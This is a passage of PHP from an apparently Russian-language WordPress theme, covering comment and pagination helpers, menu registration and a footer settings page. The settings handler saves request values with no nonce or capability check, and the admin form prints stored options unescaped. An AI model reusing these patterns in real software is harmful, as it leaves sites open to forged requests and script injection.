        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
